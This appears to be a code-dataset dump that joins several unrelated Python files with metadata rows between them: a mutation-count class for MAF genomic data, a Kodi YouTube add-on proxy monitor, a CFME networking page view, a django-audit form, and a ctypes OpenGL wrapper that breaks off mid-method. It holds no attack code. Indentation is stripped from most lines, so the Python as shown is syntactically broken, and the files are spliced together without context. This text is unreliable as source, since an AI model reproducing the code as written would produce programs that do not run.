self.__appendcount__("%s|%s|%s|%s" % (entry.data['Hugo_Symbol'], entry.data['Chrom'], entry.data['Start_Position'], entry.data['End_Position']))
def __str__(self):
str_rep = "GENE_SYMBOL\tCHROM\tSTART\tEND\tCOUNT\n"
for item in self.counts:
str_rep += "%s\t%d" % (item.replace("|", "\t"), self.counts[item])
str_rep += "\n"
return str_rep
class SampMutCounter(FeatureCounter):
def count(self, entry: MAF.Entry):
self.__appendcount__(entry.data['Tumor_Sample_Barcode'])
# self.__appendcount__(entry.Tumor_Sample_UUID)
class MutTypeCounter(FeatureCounter):
def count(self, entry: MAF.Entry):
mut_type_list = entry.determine_mutation()
for mut_type in mut_type_list:
self.__appendcount__(mut_type)
class MutTypeAtLocCounter(FeatureCounter):
def count(self, entry: MAF.Entry):
mut_type_list = entry.determine_mutation()
for mut_type in mut_type_list:
self.__appendcount__("%s|%s|%s|%s|%s|%s|%s" % (entry.data['Hugo_Symbol'], entry.data['Chrom'], entry.data['Start_Position'], entry.data['End_Position'], entry.data['Variant_Type'], entry.data['Variant_Classification'], mut_type))
def __str__(self):
str_rep = "GENE_SYMBOL\tCHROM\tSTART\tEND\tMUT_TYPE\tVARIANT_TYPE\tVARIANT_CLASS\tCOUNT\n"
for item in self.counts:
str_rep += "%s\t%d" % (item.replace("|", "\t"), self.counts[item])
str_rep += "\n"
return str_rep
class MutTypePerSampCounter(FeatureCounter):
def count(self, entry: MAF.Entry):
mut_type_list = entry.determine_mutation()
for mut_type in mut_type_list:
combin_str = "%s_|_%s" % (entry.data['Tumor_Sample_Barcode'], mut_type)
self.__appendcount__(combin_str)
@staticmethod
def prep_nuc_key_list():
nuc_characters = list("ACTG")
combo_keys = list()
for nuc1 in nuc_characters:
for nuc2 in nuc_characters:
if nuc1 != nuc2:
combo_keys.append(("%s_%s" % (nuc1, nuc2)))
combo_keys.append(("-_%s" % nuc1))
combo_keys.append(("%s_-" % nuc1))
combo_keys.append("MNC")
return combo_keys
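	# prep_nuc_key_list() returns 21 keys: the 12 ordered substitutions
	# ("A_C", "A_T", ..., "G_T"), 4 insertion keys ("-_A", ...), 4 deletion
	# keys ("A_-", ...), and the multi-nucleotide bucket "MNC".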
@staticmethod
def initialize_sample_dictionary(sample_list):
nuc_keys = MutTypePerSampCounter.prep_nuc_key_list()
grid_dict = dict()
for sample in sample_list:
if sample not in grid_dict:
grid_dict[sample] = dict()
for key in nuc_keys:
grid_dict[sample][key] = 0
return grid_dict
def get_grid_dict(self):
samples = list()
split_entries = list()
for key in sorted(self.counts.keys()):
key_split = list(key.split('_|_'))
key_split.append(self.counts[key])
split_entries.append(key_split)
if key_split[0] not in samples:
samples.append(key_split[0])
grid_dict = MutTypePerSampCounter.initialize_sample_dictionary(samples)
for entry in split_entries:
grid_dict[entry[0]][entry[1]] = entry[2]
return grid_dict
def __str__(self):
str_val = ""
grid_dict = self.get_grid_dict()
nuc_keys = MutTypePerSampCounter.prep_nuc_key_list()
first_line = "sample_ID"
for nuc_pair in nuc_keys:
first_line += "\t" + nuc_pair
first_line += "\n"
for sample in grid_dict:
entry_str = str(sample)
for nuc_pair in nuc_keys:
entry_str += "\t" + str(grid_dict[sample][nuc_pair])
entry_str += "\n"
str_val += entry_str
# str_val += "%s\t%s\t%s\n" % (key_split[0], key_split[1], key_split[2])
return first_line + str_val
|
unlicense
| 4,157,340,140,636,658,700
| 30.06962
| 232
| 0.657975
| false
| 2.722684
| false
| false
| false
|
repotvsupertuga/tvsupertuga.repository
|
plugin.video.youtube/resources/lib/youtube_plugin/kodion/utils/monitor.py
|
1
|
2946
|
import threading
from ..utils import get_proxy_server, is_proxy_live
import xbmc
import xbmcaddon
_addon = xbmcaddon.Addon('plugin.video.youtube')
class YouTubeMonitor(xbmc.Monitor):
def __init__(self, *args, **kwargs):
self._proxy_port = int(_addon.getSetting('kodion.mpd.proxy.port'))
self._old_proxy_port = self._proxy_port
self._use_proxy = _addon.getSetting('kodion.mpd.proxy') == 'true'
self.dash_proxy = None
self.proxy_thread = None
if self.use_proxy():
self.start_proxy()
xbmc.Monitor.__init__(self)
def onSettingsChanged(self):
_use_proxy = _addon.getSetting('kodion.mpd.proxy') == 'true'
_proxy_port = int(_addon.getSetting('kodion.mpd.proxy.port'))
if self._use_proxy != _use_proxy:
self._use_proxy = _use_proxy
if self._proxy_port != _proxy_port:
self._old_proxy_port = self._proxy_port
self._proxy_port = _proxy_port
if self.use_proxy() and not self.dash_proxy:
self.start_proxy()
elif self.use_proxy() and (self.old_proxy_port() != self.proxy_port()):
if self.dash_proxy:
self.restart_proxy()
elif not self.dash_proxy:
self.start_proxy()
elif not self.use_proxy() and self.dash_proxy:
self.shutdown_proxy()
def use_proxy(self):
return self._use_proxy
def proxy_port(self):
return int(self._proxy_port)
def old_proxy_port(self):
return int(self._old_proxy_port)
def proxy_port_sync(self):
self._old_proxy_port = self._proxy_port
def start_proxy(self):
if not self.dash_proxy:
xbmc.log('[plugin.video.youtube] DashProxy: Starting |{port}|'.format(port=str(self.proxy_port())), xbmc.LOGDEBUG)
self.proxy_port_sync()
self.dash_proxy = get_proxy_server(port=self.proxy_port())
if self.dash_proxy:
self.proxy_thread = threading.Thread(target=self.dash_proxy.serve_forever)
self.proxy_thread.daemon = True
self.proxy_thread.start()
def shutdown_proxy(self):
if self.dash_proxy:
xbmc.log('[plugin.video.youtube] DashProxy: Shutting down |{port}|'.format(port=str(self.old_proxy_port())), xbmc.LOGDEBUG)
self.proxy_port_sync()
self.dash_proxy.shutdown()
self.dash_proxy.socket.close()
self.proxy_thread.join()
self.proxy_thread = None
self.dash_proxy = None
def restart_proxy(self):
xbmc.log('[plugin.video.youtube] DashProxy: Restarting... |{old_port}| -> |{port}|'
.format(old_port=str(self.old_proxy_port()), port=str(self.proxy_port())), xbmc.LOGDEBUG)
self.shutdown_proxy()
self.start_proxy()
def ping_proxy(self):
return is_proxy_live(port=self.proxy_port())
|
gpl-2.0
| -6,832,723,828,920,644,000
| 34.493976
| 135
| 0.590631
| false
| 3.570909
| false
| false
| false
|
jkandasa/integration_tests
|
cfme/infrastructure/networking.py
|
1
|
1954
|
from navmazing import NavigateToAttribute
from widgetastic.widget import View
from widgetastic_patternfly import Dropdown
from cfme.base.ui import BaseLoggedInPage
from cfme.utils.appliance import Navigatable
from cfme.utils.appliance.implementations.ui import navigator, CFMENavigateStep
from widgetastic_manageiq import PaginationPane, ItemsToolBarViewSelector, Text
class InfraNetworking(Navigatable):
def __init__(self, appliance=None):
Navigatable.__init__(self, appliance)
class InfraNetworkingView(BaseLoggedInPage):
"""Base view for header and nav checking, navigatable views should inherit this"""
@property
def in_infra_networking(self):
nav_chain = ['Compute', 'Infrastructure', 'Networking']
return (
self.logged_in_as_current_user and
self.navigation.currently_selected == nav_chain)
class InfraNetworkingToolbar(View):
"""The toolbar on the main page"""
policy = Dropdown('Policy')
view_selector = View.nested(ItemsToolBarViewSelector)
class InfraNetworkingEntities(View):
"""Entities on the main page"""
title = Text('//div[@id="main-content"]//h1')
class InfraNetworkingAllView(InfraNetworkingView):
"""The "all" view -- a list"""
@property
def is_displayed(self):
return (
self.in_infra_networking and
self.entities.title.text == 'All Switches')
toolbar = View.nested(InfraNetworkingToolbar)
entities = View.nested(InfraNetworkingEntities)
paginator = PaginationPane()
@navigator.register(InfraNetworking, 'All')
class All(CFMENavigateStep):
VIEW = InfraNetworkingAllView
prerequisite = NavigateToAttribute('appliance.server', 'LoggedIn')
def step(self):
self.prerequisite_view.navigation.select('Compute', 'Infrastructure', 'Networking')
def resetter(self):
# Reset view and selection
self.view.toolbar.view_selector.select('Grid View')
|
gpl-2.0
| 3,075,071,980,845,760,000
| 30.015873
| 91
| 0.716991
| false
| 3.947475
| false
| false
| false
|
rdkls/django-audit-mongodb
|
djangoaudit/forms.py
|
1
|
1925
|
# -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (c) 2010, 2degrees Limited <egoddard@tech.2degreesnetwork.com>.
# All Rights Reserved.
#
# This file is part of djangoaudit <https://launchpad.net/django-audit/>,
# which is subject to the provisions of the BSD at
# <http://dev.2degreesnetwork.com/p/2degrees-license.html>. A copy of the
# license should accompany this distribution. THIS SOFTWARE IS PROVIDED "AS IS"
# AND ANY AND ALL EXPRESS OR IMPLIED WARRANTIES ARE DISCLAIMED, INCLUDING, BUT
# NOT LIMITED TO, THE IMPLIED WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST
# INFRINGEMENT, AND FITNESS FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""
A module to store a version of django.forms.ModelForm to work with
djangoaudit.models.AuditedModel
"""
from django.forms import ModelForm
__all__ = ['AuditedModelForm']
class AuditedModelForm(ModelForm):
"""
A version of django.forms.ModelForm to allow operator and notes to be
specified to work with djangoaudit.models.AuditedModel
"""
def save(self, commit=True, operator=None, notes=None):
"""
Save the data in the form to the audited model instance.
:param commit: Whether to commit (see django docs for more info)
:type commit: :class:`bool`
:param operator: Optional operator to record against this save
:param notes: Optional notes to record against this save
"""
if not hasattr(self.instance, '_audit_info'):
raise AttributeError("Cannot save this form as the model instance "
"does not have the attribute '_audit_info'")
self.instance.set_audit_info(operator=operator, notes=notes)
        return super(AuditedModelForm, self).save(commit=commit)
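# Usage sketch (MyAuditedModelForm is a hypothetical subclass bound to an
# AuditedModel; request comes from a Django view):
#
#   form = MyAuditedModelForm(request.POST, instance=obj)
#   if form.is_valid():
#       form.save(operator=request.user, notes="Edited via web form")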
|
bsd-3-clause
| -479,323,673,763,812,700
| 36.764706
| 79
| 0.622338
| false
| 4.487179
| false
| false
| false
|
FabriceSalvaire/PyOpenGLng
|
PyOpenGLng/Wrapper/CtypeWrapper.py
|
1
|
33545
|
####################################################################################################
#
# PyOpenGLng - An OpenGL Python Wrapper with a High Level API.
# Copyright (C) 2014 Fabrice Salvaire
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
####################################################################################################
"""This module implements a ctypes wrapper for OpenGL based on information provided by the OpenGL
API :class:`PyOpenGLng.GlApi`.
"""
####################################################################################################
import six
####################################################################################################
import collections
import ctypes
import logging
import os
import subprocess
import sys
import types
import numpy as np
####################################################################################################
from .PythonicWrapper import PythonicWrapper
from PyOpenGLng.Tools.Timer import TimerContextManager
import PyOpenGLng.Config as Config
import PyOpenGLng.GlApi.Getter as Getter
####################################################################################################
_module_logger = logging.getLogger(__name__)
####################################################################################################
# Fixme: unsigned comes from typedef
# not gl, but translated c type in fact
__to_ctypes_type__ = {
'char':ctypes.c_char,
'int8_t':ctypes.c_byte, # c_int8
'uint8_t':ctypes.c_ubyte, # c_uint8
'unsigned char':ctypes.c_ubyte,
'short':ctypes.c_short,
'unsigned short':ctypes.c_ushort,
'int32_t':ctypes.c_int32,
'int':ctypes.c_int32, # not 64-bit integer!
'unsigned int':ctypes.c_uint32,
'int64_t':ctypes.c_int64,
'uint64_t':ctypes.c_uint64,
'float':ctypes.c_float,
'float_t':ctypes.c_float,
'double':ctypes.c_double,
'intptr_t':ctypes.c_void_p, # ?
'ptrdiff_t':ctypes.c_void_p, # int64 ?
'ssize_t':ctypes.c_uint64, # ?
}
__numpy_to_ctypes_type__ = {
'<u1':ctypes.c_uint8,
'<u2':ctypes.c_uint16,
'<u4':ctypes.c_uint32,
'<u8':ctypes.c_uint64,
'<i1':ctypes.c_int8,
'<i2':ctypes.c_int16,
'<i4':ctypes.c_int32,
'<i8':ctypes.c_int64,
'<f4':ctypes.c_float,
'<f8':ctypes.c_double,
}
def to_ctypes_type(parameter):
""" Return the ctypes type corresponding to a parameter. """
if parameter.is_generic_pointer():
return ctypes.c_void_p
else:
c_type = str(parameter.c_type)
return __to_ctypes_type__[c_type]
def numpy_to_ctypes_type(array):
""" Return the ctypes type corresponding to a Numpy array data type. """
return __numpy_to_ctypes_type__.get(array.dtype.str, None)
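# Example: a little-endian float32 Numpy array maps to ctypes.c_float, since
# its dtype.str is '<f4'; unknown dtypes fall back to None —
#	numpy_to_ctypes_type(np.zeros(3, dtype=np.float32)) is ctypes.c_float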
####################################################################################################
__command_directives__ = {
'glShaderSource':{'length':None,},
# length = NULL for null terminated string and solve len(pointer_parameters) == 2
}
####################################################################################################
def check_numpy_type(array, ctypes_type):
""" Check the Numpy array data type is same as *ctypes_type*. """
if numpy_to_ctypes_type(array) != ctypes_type:
raise ValueError("Type mismatch: %s instead of %s" % (array.dtype, ctypes_type.__name__))
####################################################################################################
class GlEnums(object):
##############################################
def __iter__(self):
for attribute in sorted(six.iterkeys(self.__dict__)):
if attribute.startswith('GL_'):
yield attribute
####################################################################################################
class GlCommands(object):
##############################################
def __iter__(self):
# for attribute, value in self.__dict__.iteritems():
# if attribute.startswith('gl'):
# yield value
for attribute in sorted(six.iterkeys(self.__dict__)):
if attribute.startswith('gl'):
yield getattr(self, attribute)
####################################################################################################
class ParameterWrapperBase(object):
# Fixme: wrapper, translator
""" Base class for parameter wrapper. """
##############################################
def repr_string(self, parameter):
return self.__class__.__name__ + '<' + parameter.format_gl_type() + '> ' + parameter.name
##############################################
def __repr__(self):
return self.repr_string(self._parameter)
####################################################################################################
class ParameterWrapper(ParameterWrapperBase):
""" Translate a fundamental type. """
##############################################
def __init__(self, parameter):
self._parameter = parameter
self._location = parameter.location # Fixme: doublon?
self._type = to_ctypes_type(parameter)
##############################################
def from_python(self, parameter, c_parameters):
c_parameters[self._location] = self._type(parameter)
return None
####################################################################################################
class PointerWrapper(ParameterWrapperBase):
""" Translate a pointer.
This wrapper handle all the case which are not managed by a :class:`ReferenceWrapper`, an
:class:`InputArrayWrapper` or an :class:`OutputArrayWrapper`.
These parameters are identified in the prototype as a pointer that doesn't have a size parameter
or a computed size.
If the pointer type is *char* then user must provide a string or a Python object with a
:meth:`__str__` method, else a Numpy array must be provided and the data type is only checked if
the pointer is not generic.
If the parameter value is :obj:`None`, the value is passed as is.
"""
_logger = _module_logger.getChild('PointerWrapper')
##############################################
def __init__(self, parameter):
# Fixme: same as ...
self._parameter = parameter
self._location = parameter.location
self._type = to_ctypes_type(parameter)
##############################################
def from_python(self, parameter, c_parameters):
if self._type == ctypes.c_char and self._parameter.const: # const char *
if self._logger.isEnabledFor(logging.DEBUG):
self._logger.debug('const char *')
if not isinstance(parameter, bytes):
parameter = six.b(parameter)
ctypes_parameter = ctypes.c_char_p(parameter)
elif isinstance(parameter, np.ndarray):
if self._logger.isEnabledFor(logging.DEBUG):
self._logger.debug('ndarray')
if self._type != ctypes.c_void_p:
check_numpy_type(parameter, self._type)
ctypes_parameter = parameter.ctypes.data_as(ctypes.POINTER(self._type))
elif parameter is None:
if self._logger.isEnabledFor(logging.DEBUG):
self._logger.debug('None')
ctypes_parameter = None # already done
else:
raise NotImplementedError
c_parameters[self._location] = ctypes_parameter
return None
####################################################################################################
class ReferenceWrapper(ParameterWrapperBase):
""" Translate a parameter passed by reference.
A parameter passed by reference is identified in the prototype as a non const pointer of a fixed
size of 1.
A reference parameter is removed in the Python prototype and the value set by the command is
pushed out in the return.
"""
##############################################
def __init__(self, parameter):
# Fixme: same as ...
self._parameter = parameter
self._location = parameter.location
self._type = to_ctypes_type(parameter)
##############################################
def from_python(self, c_parameters):
ctypes_parameter = self._type()
c_parameters[self._location] = ctypes.byref(ctypes_parameter)
to_python_converter = ValueConverter(ctypes_parameter)
return to_python_converter
####################################################################################################
class ArrayWrapper(ParameterWrapperBase):
""" Base class for Array Wrapper. """
##############################################
def __init__(self, size_parameter):
# Fixme: size_multiplier
# excepted some particular cases
pointer_parameter = size_parameter.pointer_parameters[0]
# Fixme: for debug
self._size_parameter = size_parameter
self._pointer_parameter = pointer_parameter
self._size_location = size_parameter.location
self._size_type = to_ctypes_type(size_parameter)
self._pointer_location = pointer_parameter.location
self._pointer_type = to_ctypes_type(pointer_parameter)
##############################################
def __repr__(self):
return self.repr_string(self._pointer_parameter)
####################################################################################################
class OutputArrayWrapper(ArrayWrapper):
""" Translate an output array parameter.
If the pointer is generic, then the array is passed as a Numpy array and the size is specified
in bytes. <<CHECK>>
If the pointer is of \*char type, then the size is passed by the user and a string is returned.
If the user passes a Numpy array, then the data type is checked and the size is set by the
wrapper.
If the user passes a size, then a Numpy array (or a list, for sizes below
<<size_parameter_threshold>>) is created and returned.
"""
_logger = _module_logger.getChild('OutputArrayWrapper')
size_parameter_threshold = 20
##############################################
def from_python(self, parameter, c_parameters):
# print self._pointer_parameter.long_repr(), self._pointer_type, type(parameter)
if self._pointer_type == ctypes.c_void_p:
if self._logger.isEnabledFor(logging.DEBUG):
self._logger.debug('void *')
# Generic pointer: thus the array data type is not specified by the API
if isinstance(parameter, np.ndarray):
# The output array is provided by user and the size is specified in byte
array = parameter
c_parameters[self._size_location] = self._size_type(array.nbytes)
ctypes_parameter = array.ctypes.data_as(ctypes.c_void_p)
c_parameters[self._pointer_location] = ctypes_parameter
return None
else:
raise NotImplementedError
elif self._pointer_type == ctypes.c_char:
if self._logger.isEnabledFor(logging.DEBUG):
self._logger.debug('char *')
# The array size is provided by user
size_parameter = parameter
c_parameters[self._size_location] = self._size_type(size_parameter)
ctypes_parameter = ctypes.create_string_buffer(size_parameter)
c_parameters[self._pointer_location] = ctypes_parameter
to_python_converter = StringConverter(ctypes_parameter)
return to_python_converter
elif isinstance(parameter, np.ndarray):
if self._logger.isEnabledFor(logging.DEBUG):
self._logger.debug('ndarray')
# Typed pointer
# The output array is provided by user
array = parameter
check_numpy_type(array, self._pointer_type)
c_parameters[self._size_location] = self._size_type(array.size)
ctypes_parameter = array.ctypes.data_as(ctypes.POINTER(self._pointer_type))
c_parameters[self._pointer_location] = ctypes_parameter
return None
else:
if self._logger.isEnabledFor(logging.DEBUG):
self._logger.debug('else')
# Typed pointer
# The array size is provided by user
size_parameter = parameter
c_parameters[self._size_location] = self._size_type(size_parameter)
if size_parameter >= self.size_parameter_threshold:
array = np.zeros((size_parameter), dtype=self._pointer_type)
ctypes_parameter = array.ctypes.data_as(ctypes.POINTER(self._pointer_type))
to_python_converter = IdentityConverter(array)
else:
array_type = self._pointer_type * size_parameter
ctypes_parameter = array_type()
to_python_converter = ListConverter(ctypes_parameter)
c_parameters[self._pointer_location] = ctypes_parameter
return to_python_converter
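# Hedged illustration (not part of the original module): for a command such as
# glGenBuffers(GLsizei n, GLuint *buffers), calling wrapper.glGenBuffers(3)
# allocates a ctypes array of 3 elements and returns a Python list of ids,
# while a size >= size_parameter_threshold (20) would allocate a Numpy array
# and return it through an IdentityConverter instead.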
####################################################################################################
class InputArrayWrapper(ArrayWrapper):
_logger = _module_logger.getChild('InputArrayWrapper')
##############################################
def from_python(self, array, c_parameters):
# print array
# print self._pointer_parameter.long_repr()
# print self._pointer_type
if self._pointer_parameter.pointer == 2:
if self._pointer_type == ctypes.c_char: # Fixme: should be c_char_p
if isinstance(array, str):
if self._logger.isEnabledFor(logging.DEBUG):
self._logger.debug('string -> const char **')
size_parameter = 1
string_array_type = ctypes.c_char_p * 1
string_array = string_array_type(ctypes.c_char_p(six.b(array)))
else:
if self._logger.isEnabledFor(logging.DEBUG):
self._logger.debug('string array -> const char **')
size_parameter = len(array)
string_array_type = ctypes.c_char_p * size_parameter
string_array = string_array_type(*[ctypes.c_char_p(x) for x in array])
ctypes_parameter = string_array
else:
raise NotImplementedError
elif isinstance(array, np.ndarray):
if self._logger.isEnabledFor(logging.DEBUG):
self._logger.debug('ndarray')
if self._pointer_type == ctypes.c_void_p:
size_parameter = array.nbytes
elif self._pointer_type == ctypes.c_float: # fixme
size_parameter = 1 # array.shape[0]
# else:
# size_parameter = array.nbytes
# ctypes_parameter = array.ctypes.data_as(ctypes.c_void_p)
ctypes_parameter = array.ctypes.data_as(ctypes.POINTER(self._pointer_type))
elif isinstance(array, collections.Iterable):
size_parameter = len(array)
array_type = self._pointer_type * size_parameter
if six.PY3:
if size_parameter > 1:
ctypes_parameter = array_type(array)
else:
ctypes_parameter = array_type(array[0])
else:
ctypes_parameter = array_type(array)
else:
raise ValueError(str(array))
c_parameters[self._size_location] = self._size_type(size_parameter)
c_parameters[self._pointer_location] = ctypes_parameter
return None
####################################################################################################
class ToPythonConverter(object):
""" Base class for C to Python converter. """
##############################################
def __init__(self, c_object):
""" The parameter *c_object* is a ctype object. """
self._c_object = c_object
####################################################################################################
class IdentityConverter(ToPythonConverter):
""" Identity converter. """
def __call__(self):
return self._c_object
class ListConverter(ToPythonConverter):
""" Convert the C object to a Python list. """
def __call__(self):
return list(self._c_object)
class ValueConverter(ToPythonConverter):
""" Get the Python value of the ctype object. """
def __call__(self):
return self._c_object.value
class StringConverter(ToPythonConverter):
""" Get the Python value of the ctype object. """
def __call__(self):
value = self._c_object.value
if value is not None:
return value.decode('ascii')
else:
return None
####################################################################################################
class CommandNotAvailable(Exception):
pass
####################################################################################################
class GlCommandWrapper(object):
_logger = _module_logger.getChild('GlCommandWrapper')
##############################################
def __init__(self, wrapper, command):
self._wrapper = wrapper
self._command = command
self._number_of_parameters = command.number_of_parameters
self._call_counter = 0
try:
self._function = getattr(self._wrapper.libGL, str(command))
except AttributeError:
raise CommandNotAvailable("OpenGL function %s was no found in libGL" % (str(command)))
# Only for simple prototype
# argument_types = [to_ctypes_type(parameter) for parameter in command.parameters]
# if argument_types:
# self._function.argtypes = argument_types
command_directive = __command_directives__.get(str(command), None)
self._parameter_wrappers = []
self._reference_parameter_wrappers = []
for parameter in command.parameters:
if parameter.type in ('GLsync', 'GLDEBUGPROC'):
raise NotImplementedError
parameter_wrapper = None
if command_directive and parameter.name in command_directive:
# Fixme: currently used for unspecified parameters (value set to 0)
pass # skip and will be set to None
elif parameter.pointer:
if parameter.size_parameter is None and parameter.array_size == 1:
# not const, array_size = 1 must be sufficient
parameter_wrapper = ReferenceWrapper(parameter)
elif parameter.size_parameter is None or parameter.computed_size:
parameter_wrapper = PointerWrapper(parameter)
else:
pass # skip and will be set by pointer parameter
elif parameter.pointer_parameters: # size parameter
# Fixme: len(pointer_parameters) > 1
# Only these functions have len(pointer_parameters) > 1
# glAreTexturesResident
# glGetDebugMessageLog
# glPrioritizeTextures
# glShaderSource
pointer_parameter = parameter.pointer_parameters[0]
if pointer_parameter.const:
parameter_wrapper = InputArrayWrapper(parameter)
else:
parameter_wrapper = OutputArrayWrapper(parameter)
else:
parameter_wrapper = ParameterWrapper(parameter)
if parameter_wrapper is not None:
if isinstance(parameter_wrapper, ReferenceWrapper):
parameter_list = self._reference_parameter_wrappers
else:
parameter_list = self._parameter_wrappers
parameter_list.append(parameter_wrapper)
return_type = command.return_type
if return_type.type == 'GLsync':
raise NotImplementedError
elif return_type.type != 'void': # Fixme: .type or .c_type?
# Fixme: -> to func?
ctypes_type = to_ctypes_type(return_type)
if return_type.pointer:
if ctypes_type == ctypes.c_ubyte: # return type is char *
ctypes_type = ctypes.c_char_p
else:
raise NotImplementedError
self._function.restype = ctypes_type
self._return_void = False
else:
self._function.restype = None
self._return_void = True # Fixme: required or doublon?
# Getter
if command.name in Getter.commands_dict:
command_dict = Getter.commands_dict[command.name]
self._getter = {}
for enum, type_and_size in six.iteritems(command_dict):
try:
enum_value = getattr(wrapper.enums, enum)
self._getter[enum_value] = type_and_size
except AttributeError:
self._logger.warn("Enum {} not found".format(enum))
manual_page = self._manual_page()
if manual_page is not None:
doc = '%s - %s\n\n' % (self._command, manual_page.purpose)
else:
doc = ''
parameter_doc = ', '.join([repr(parameter_wrapper) for parameter_wrapper in self._parameter_wrappers])
self.__doc__ = doc + "%s (%s)" % (self._command, parameter_doc)
##############################################
def __call__(self, *args, **kwargs):
self._call_counter += 1
if len(self._parameter_wrappers) != len(args):
self._logger.warn("%s requires %u arguments, but %u was given\n %s\n %s",
str(self._command), len(self._parameter_wrappers), len(args),
self._command.prototype(),
str([parameter_wrapper.__class__.__name__
for parameter_wrapper in self._parameter_wrappers]))
# Initialise the input/output parameter array
c_parameters = [None]*self._number_of_parameters
to_python_converters = []
# Set the input parameters and append python converters for output
# first process the given parameters
for parameter_wrapper, parameter in zip(self._parameter_wrappers, args):
to_python_converter = parameter_wrapper.from_python(parameter, c_parameters)
if to_python_converter is not None:
to_python_converters.append(to_python_converter)
# second process the parameters by reference
for parameter_wrapper in self._reference_parameter_wrappers:
to_python_converter = parameter_wrapper.from_python(c_parameters)
if to_python_converter is not None:
to_python_converters.append(to_python_converter)
if self._logger.isEnabledFor(logging.DEBUG):
self._logger.debug('Call\n'
' ' + self._command.prototype() + '\n'
' ' + str([parameter_wrapper.__class__.__name__
for parameter_wrapper in self._parameter_wrappers]) + '\n'
' ' + str(c_parameters) + '\n'
' ' + str([to_python_converter.__class__.__name__
for to_python_converter in to_python_converters])
)
result = self._function(*c_parameters)
# Check error
if kwargs.get('check_error', False):
self._wrapper.check_error()
# Manage return
if to_python_converters:
output_parameters = [to_python_converter() for to_python_converter in to_python_converters]
if self._return_void:
# Extract unique element
# Fixme: to func?, gives some cases to explain
if len(output_parameters) == 1:
output_parameter = output_parameters[0]
if isinstance(output_parameter, list) and len(output_parameter) == 1: # unique output parameter is [a,]
# Fixme: could be worse than simpler, if we really expect a list
return output_parameter[0]
else:
return output_parameter
else:
return output_parameters
else:
return [result] + output_parameters
else:
if not self._return_void:
return result
##############################################
def __repr__(self):
return str(self._command.name) + ' ' + str(self._function.argtypes) + ' -> ' + str(self._function.restype)
##############################################
def _manual_page(self):
command_name = str(self._command)
for name in ['man' + str(i) for i in range(4, 1, -1)]:
    # Fixme: use API version mapping
    manual = self._wrapper._manuals[name]
    if command_name in manual:
        return manual[command_name]
# the early return in the loop prevented searching man3 and man2; fall through instead
return None
##############################################
def _xml_manual_name(self):
# some commands are merged together: e.g. glVertexAttrib.xml
page = self._manual_page()
if page is not None:
page_name = page.page_name
else:
page_name = str(self._command)
return page_name + '.xml'
##############################################
def xml_manual_path(self):
return os.path.join(Config.Path.manual_path(self._wrapper.api_number), self._xml_manual_name())
##############################################
def xml_manual_url(self, local=False):
if local:
return 'file://' + self.xml_manual_path()
else:
return 'http://www.opengl.org/sdk/docs/man/xhtml/' + self._xml_manual_name()
##############################################
def manual(self, local=False):
if sys.platform.startswith('linux'):
url = self.xml_manual_url(local)
browser = 'xdg-open'
subprocess.Popen([browser, url])
# import webbrowser
# webbrowser.open(url)
else:
raise NotImplementedError
##############################################
def help(self):
# Fixme: help(instance)
print(self.__doc__)
##############################################
@property
def call_counter(self):
return self._call_counter
##############################################
def reset_call_counter(self):
self._call_counter = 0
####################################################################################################
class CtypeWrapper(object):
libGL = None
_logger = _module_logger.getChild('CtypeWrapper')
##############################################
@classmethod
def load_library(cls, libGL_name):
cls.libGL = ctypes.cdll.LoadLibrary(libGL_name)
cls.libGL.glGetString.restype = ctypes.c_char_p
GL_VERSION = int('0x1F02', 16)
version_string = cls.libGL.glGetString(GL_VERSION)
if version_string is not None:
version_string = version_string.decode('ascii')
return version_string
##############################################
def __init__(self, gl_spec, api, api_number, profile=None, manuals=None):
# self._gl_spec = gl_spec
self.api_number = api_number
self._manuals = manuals
with TimerContextManager(self._logger, 'generate_api'):
api_enums, api_commands = gl_spec.generate_api(api, api_number, profile) # 0.080288 s
self._init_enums(api_enums)
self._init_commands(api_commands)
#!# self._pythonic_wrapper = PythonicWrapper(self)
##############################################
def _init_enums(self, api_enums):
gl_enums = GlEnums()
reverse_enums = {}
for enum in api_enums:
# We don't provide more information on enumerants, use GlAPI instead
enum_name, enum_value = str(enum), int(enum)
# store enumerants and commands at the same level
setattr(self, enum_name, enum_value)
# store enumerants in a dedicated place
setattr(gl_enums, enum_name, enum_value)
reverse_enums[enum_value] = enum_name
self.enums = gl_enums
self.reverse_enums = reverse_enums
##############################################
def _init_commands(self, api_commands):
gl_commands = GlCommands()
for command in six.itervalues(api_commands):
try:
command_name = str(command)
command_wrapper = GlCommandWrapper(self, command)
# store enumerants and commands at the same level
if hasattr(PythonicWrapper, command_name):
method = getattr(PythonicWrapper, command_name)
if six.PY3:
rebinded_method = types.MethodType(method, self)
else:
rebinded_method = types.MethodType(method.__func__, self, self.__class__)
setattr(self, command_name, rebinded_method)
else:
setattr(self, command_name, command_wrapper)
# store commands in a dedicated place
setattr(gl_commands, command_name, command_wrapper)
except NotImplementedError:
self._logger.warn("Command %s is not supported by the wrapper", str(command))
except CommandNotAvailable:
self._logger.warn("Command %s is not implemented by the vendor", str(command))
self.commands = gl_commands
##############################################
def check_error(self):
error_code = self.glGetError()
if error_code:
error_message = self._error_code_message(error_code)
raise NameError(error_message)
##############################################
def _error_code_message(self, error_code):
if not error_code:
# GL_NO_ERROR: The value of this symbolic constant is guaranteed to be 0.
return 'No error has been recorded.'
else:
if error_code == self.GL_INVALID_ENUM:
return 'An unacceptable value is specified for an enumerated argument.'
elif error_code == self.GL_INVALID_VALUE:
return 'A numeric argument is out of range.'
elif error_code == self.GL_INVALID_OPERATION:
return 'The specified operation is not allowed in the current state.'
elif error_code == self.GL_INVALID_FRAMEBUFFER_OPERATION:
return 'The framebuffer object is not complete.'
elif error_code == self.GL_OUT_OF_MEMORY:
return 'There is not enough memory left to execute the command.'
elif error_code == self.GL_STACK_UNDERFLOW:
return 'An attempt has been made to perform an operation that would cause an internal stack to underflow.'
elif error_code == self.GL_STACK_OVERFLOW:
return 'An attempt has been made to perform an operation that would cause an internal stack to overflow.'
else:
raise NotImplementedError
##############################################
def error_checker(self):
return ErrorContextManager(self)
##############################################
def called_commands(self):
